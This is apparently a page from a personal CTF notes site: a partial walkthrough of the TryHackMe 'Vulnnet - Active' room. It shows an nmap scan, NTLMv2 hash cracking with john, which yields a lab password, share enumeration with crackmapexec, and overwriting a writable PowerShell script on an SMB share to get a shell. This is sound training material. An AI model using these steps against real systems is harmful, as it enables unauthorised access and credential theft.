Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  1. TryHackMe Rooms

Vulnnet - Active

LLMNR via Redis Server - Replacing .ps1 scripts for shell - SeImpersonate Privilege Escalation

Scanning

Starting off with a Nmap scan

# Nmap 7.94 scan initiated Tue Jun 27 19:51:35 2023 as: nmap -sCV -A -p 53,135,139,445,464,6479,9389,49666,49668,49669,49670,49677,49686 -T4 -vvv -oN nmap.log -Pn 10.10.209.190
Nmap scan report for 10.10.209.190
Host is up, received user-set (0.27s latency).
Scanned at 2023-06-27 19:51:35 IST for 104s

PORT      STATE    SERVICE       REASON      VERSION
53/tcp    open     domain        syn-ack     Simple DNS Plus
135/tcp   open     msrpc         syn-ack     Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack     Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds? syn-ack
464/tcp   open     kpasswd5?     syn-ack
6479/tcp  open     redis         syn-ack
9389/tcp  open     mc-nmf        syn-ack     .NET Message Framing
49666/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49668/tcp open     ncacn_http    syn-ack     Microsoft Windows RPC over HTTP 1.0
49669/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49670/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49677/tcp open     msrpc         syn-ack     Microsoft Windows RPC
49686/tcp open     msrpc         syn-ack     Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24676/tcp): CLEAN (Timeout)
|   Check 2 (port 58166/tcp): CLEAN (Timeout)
|   Check 3 (port 53820/udp): CLEAN (Timeout)
|   Check 4 (port 45247/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2023-06-27T14:22:39
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 27 19:53:19 2023 -- 1 IP address (1 host up) scanned in 104.10 seconds

Enumeration

cash@secure:~/active$ john hash --wordlist=/opt/rockyou.txt 
Created directory: /home/cash/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sand_0873959498  (enterprise-security)     
1g 0:00:00:02 DONE (2023-06-27 20:05) 0.4347g/s 1745Kp/s 1745Kc/s 1745KC/s sandoval69..sanat85
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
cash@secure:~/active$ crackmapexec smb 10.10.209.190 -u 'enterprise-security' -p 'sand_0873959498' --shares
SMB         10.10.209.190   445    VULNNET-BC3TCK1  [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)
SMB         10.10.209.190   445    VULNNET-BC3TCK1  [+] vulnnet.local\enterprise-security:sand_0873959498 
SMB         10.10.209.190   445    VULNNET-BC3TCK1  [+] Enumerated shares
SMB         10.10.209.190   445    VULNNET-BC3TCK1  Share           Permissions     Remark
SMB         10.10.209.190   445    VULNNET-BC3TCK1  -----           -----------     ------
SMB         10.10.209.190   445    VULNNET-BC3TCK1  ADMIN$                          Remote Admin
SMB         10.10.209.190   445    VULNNET-BC3TCK1  C$                              Default share
SMB         10.10.209.190   445    VULNNET-BC3TCK1  Enterprise-Share READ            
SMB         10.10.209.190   445    VULNNET-BC3TCK1  IPC$            READ            Remote IPC
SMB         10.10.209.190   445    VULNNET-BC3TCK1  NETLOGON        READ            Logon server share 
SMB         10.10.209.190   445    VULNNET-BC3TCK1  SYSVOL          READ            Logon server share 
cash@secure:~/active$ smbclient -U enterprise-security \\\\10.10.209.190\\Enterprise-Share
Password for [WORKGROUP\enterprise-security]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Feb 24 04:15:41 2021
  ..                                  D        0  Wed Feb 24 04:15:41 2021
  PurgeIrrelevantData_1826.ps1        A       69  Wed Feb 24 06:03:18 2021

                9558271 blocks of size 4096. 5159813 blocks available
smb: \> del PurgeIrrelevantData_1826.ps1 
NT_STATUS_ACCESS_DENIED deleting remote file \PurgeIrrelevantData_1826.ps1
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (3.3 kb/s) (average 3.3 kb/s)
smb: \> ls
  .                                   D        0  Wed Feb 24 04:15:41 2021
  ..                                  D        0  Wed Feb 24 04:15:41 2021
  PurgeIrrelevantData_1826.ps1        A     4402  Tue Jun 27 20:14:36 2023

                9558271 blocks of size 4096. 5159755 blocks available
PreviousVulnnet - RoastedNextVulnnet - Internal

Last updated 1 year ago

🛤️